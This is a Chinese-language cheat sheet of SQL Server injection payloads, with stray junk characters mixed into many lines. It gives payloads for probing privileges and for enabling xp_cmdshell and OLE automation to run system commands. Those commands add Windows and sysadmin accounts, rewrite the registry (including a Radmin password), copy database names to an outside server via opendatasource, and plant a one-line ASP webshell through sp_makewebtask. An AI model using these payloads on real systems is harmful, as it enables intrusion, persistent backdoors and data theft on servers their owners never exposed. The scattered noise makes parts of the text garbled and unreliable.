常用的一些注入命令

admin

//看看是什么权限的
, w& h/ i- ~, U9 U; ]and 1=(Select IS_MEMBER('db_owner'))
& D7 G0 ~: \; C+ \. [+ @1 h0 ?/ cAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
4 X* n  P5 b8 |3 |/ C
4 {4 I2 ~5 o% X! U5 P9 I//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
5 {# w! ^1 ~0 J" D4 l  i1 BAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

( a+ K1 D+ v6 ~( |5 X1 ]
' r8 I' @# t4 f7 J" \5 g数字类型
! w* `& x  y- y% ]and char(124)%2Buser%2Bchar(124)=0

6 H, g) X7 @" M字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
* Z( Z8 I2 W/ s" w
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

) t. e. A- ^+ b) d3 P- Z4 E) a爆用户名
$ j0 _9 z% I  P1 T' z% iand user>0
' and user>0 and ''='

" |7 n6 H% O& z4 Y检测是否为SA权限
% _5 L% ^4 P6 l+ band 1=(select IS_SRVROLEMEMBER('sysadmin'));--
: y3 s6 v! e. X9 }5 lAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

% ?8 l9 o+ V8 G: r  F/ [! i检测是不是MSSQL数据库
' m5 U: u2 Z) Q( B, F) ~) Pand exists (select * from sysobjects);--
4 M% j; v# s' o& A3 P
检测是否支持多行
$ q. m/ x  a9 r: E0 e* C;declare @d int;--

恢复 xp_cmdshell
- ?$ [, Z6 ~; B;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
6 f  q' h" b: D2 ^//       执行命令
//-----------------------
首先开启沙盘模式：
6 y5 |5 z8 Y+ ?" s9 c5 ]exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

+ I+ u/ h" U* X& x# _! m执行命令
$ s3 {$ g4 i0 K' r. C7 w;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
  E" V  D8 J4 Q. J# U& I
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
2 J. P# N/ v9 w9 ~) x$ E% r
& p% Y" A( a, Z7 s6 Z& N写注册表
4 {' j5 Q$ ]. n) gexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
+ ^" h  ~6 r9 w( W4 `
2 K6 `( F  l9 ]1 ~& A1 uREG_SZ

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
; y! F- |7 Q" a: l1 W, g4 f
读取目录内容
, F0 S* c; l- ^. F' {# t5 @exec master..xp_dirtree 'c:\winnt\system32\',1,1
* j6 ^" ]: I; _$ D- M+ ]

数据库备份
backup database pubs to disk = 'c:\123.bak'

4 g/ m! G. q+ w$ y5 N//爆出长度
2 `5 y) P0 o) A9 r' o: n$ `And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
  C6 _' p; S/ n( L6 x- t7 C5 D
7 c( Q( _7 d7 G" ^8 ]0 h( G, S
1 e3 y, ]9 U% L7 q7 Y
更改sa口令方法：用sql综合利用工具连接后，执行命令：
5 ~$ y4 d6 M6 O( j* Y: o, Oexec sp_password NULL,'新密码','sa'
- }4 M2 z6 c* ]: k
添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,9530772
0 n+ G: `6 ?* _. @- V% Texec master.dbo.sp_addsrvrolemember test,sysadmin
$ r. Y5 i7 X& O: a
删除扩展存储过过程xp_cmdshell的语句:
7 v" |$ s' u6 N3 y" hexec sp_dropextendedproc 'xp_cmdshell'
0 t' S% K# U5 M8 x/ `6 e
* F, M; j. d0 w0 Y; D8 B$ z添加扩展存储过过程
( p$ M2 J2 r, @; y+ F. SEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
5 A; a" x! ]  ], p: K

, n6 e5 @" C: G8 q# P停掉或激活某个服务。

0 ]# X+ c! t$ O6 Wexec master..xp_servicecontrol 'stop','schedule'
0 ]- D7 Q3 m! Eexec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

' u* s1 W4 `: V/ g( Zdbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
8 @0 T: X5 |1 x9 h4 y- Z8 @6 i所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
% _9 i3 ]4 G, X'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
$ `3 D) o3 P5 y, l' ?% B( T) B'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process
+ r' B; o) J* [6 o
% j" c% T- H4 m0 E/ I# H停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
+ \& O5 O% F1 h. k1 S1 M- p
# ~' x5 b8 F3 B" O' X" R) ~xp_terminate_process 2484

4 `! X- L0 I' T7 u( ]- T, bxp_unpackcab
5 w: y" z3 A' |3 e9 O
解开压缩档。
; I6 P" w: z) p4 L; ]. a8 u
7 q! g, {$ r0 S0 pxp_unpackcab 'c:\test.cab','c:\temp',1


, j* _: a, t' |3 |某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
+ z- }2 i6 U: e: h4 y
' B1 [# P. R7 t" ?* N5 s: jcreate database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
6 M- B) {2 u. Y5 @9 y

; d: U: j# t9 E//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
# `/ Q: k6 I4 c  R0 `  U
% S  T- n( V9 j* h1 _用 sp_makewebtask直接在web目录里写入一句话马：
5 I1 u' z& z: |/ E0 z& fhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
6 \9 S7 W2 I; e
, a8 p$ ]( i$ e! c7 ?7 |* D. K//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3